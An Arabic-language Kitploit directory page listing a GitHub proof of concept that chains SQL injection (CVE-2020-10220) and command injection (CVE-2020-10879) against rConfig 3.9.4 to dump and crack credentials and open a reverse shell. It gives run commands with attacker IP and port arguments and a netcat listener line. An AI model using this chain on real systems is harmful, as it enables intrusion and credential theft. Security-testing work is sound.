Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rConfig_rce — PoCs مجمعة لـ rConfig: SQL Injection (CVE-2020-10220) و Command Injection (CVE-2020-10879) | Kitploit
أدوات/GitHubGitHub/cspanias/rconfig_rce
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليم
GitHubcspanias/rconfig_rce

rConfig_rce

PoCs مجمعة لـ rConfig: SQL Injection (CVE-2020-10220) و Command Injection (CVE-2020-10879)

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

rConfig 3.9 PoC مشترك لحقن SQL وحقن الأوامر

نظرة عامة

يستهدف هذا PoC إصدار rConfig 3.9.4 ويوضح الاستغلال من خلال مزيج من ثغرات حقن SQL وحقن الأوامر عن بعد. يقوم بأتمتة عملية:

  1. استخراج اسم قاعدة البيانات عبر SQLi
  2. تفريغ بيانات اعتماد المستخدمين من قاعدة البيانات
  3. محاولة كسر تجزئات كلمات المرور باستخدام hashcat مع قائمة كلمات rockyou وقواعد best64.rules
  4. اختيارياً، تنفيذ أوامر عن بعد (RCE) عبر حقن الأوامر في وظيفة البحث، باستخدام بيانات اعتماد المسؤول المكسورة

يعتمد هذا السكريبت على اثنين من PoCs الأصليين ويجمعهما:

  • 48208.py (حقن SQL) من قبل vikingfr
  • 48241.py (حقن أوامر) من قبل Matthew Aberegg و Michael Burkey

تم تعديله لأتمتة الكسر والإطلاق الاختياري للقشرة.

المتطلبات

  • Python 3
  • مكتبة requests (pip install requests)
  • hashcat مثبت ويمكن الوصول إليه عبر سطر الأوامر
  • قائمة كلمات rockyou.txt (أو ما يعادلها) موجودة في /usr/share/wordlists/rockyou.txt
  • ملف قواعد hashcat /usr/share/hashcat/rules/best64.rule

الاستخدام

لتفريغ المستخدمين والتجزئات فقط:

root@kitploit:~
python3 rConfig_rce.py https://target

لتفريغ المستخدمين، وكسر كلمات المرور، ومحاولة RCE (يتطلب عنوان IP ومنفذ المهاجم للقشرة العكسية):

root@kitploit:~
python3 rConfig_rce.py https://target attacker_ip attacker_port

ملاحظات

  • إذا فشل hashcat في كسر كلمة المرور، يقترح السكريبت استخدام خدمات الكسر عبر الإنترنت مثل CrackStation.
  • إذا تعذر كسر تجزئة كلمة المرور تلقائياً، سيُطلب منك إدخال كلمة المرور النصية يدوياً لمحاولات RCE.
  • يعطي السكريبت أولوية لاستخدام حساب admin في مرحلة حقن الأوامر.
  • تأكد من وجود مستمع (مثل nc -lvnp 80) يعمل على جهاز المهاجم لالتقاط القشرة العكسية.

إخلاء مسؤولية

هذه الأداة مخصصة فقط لاختبار الأمان المصرح به والأغراض التعليمية. الاستخدام غير المصرح به ضد الأنظمة دون إذن غير قانوني وغير أخلاقي.

تنزيل الأداة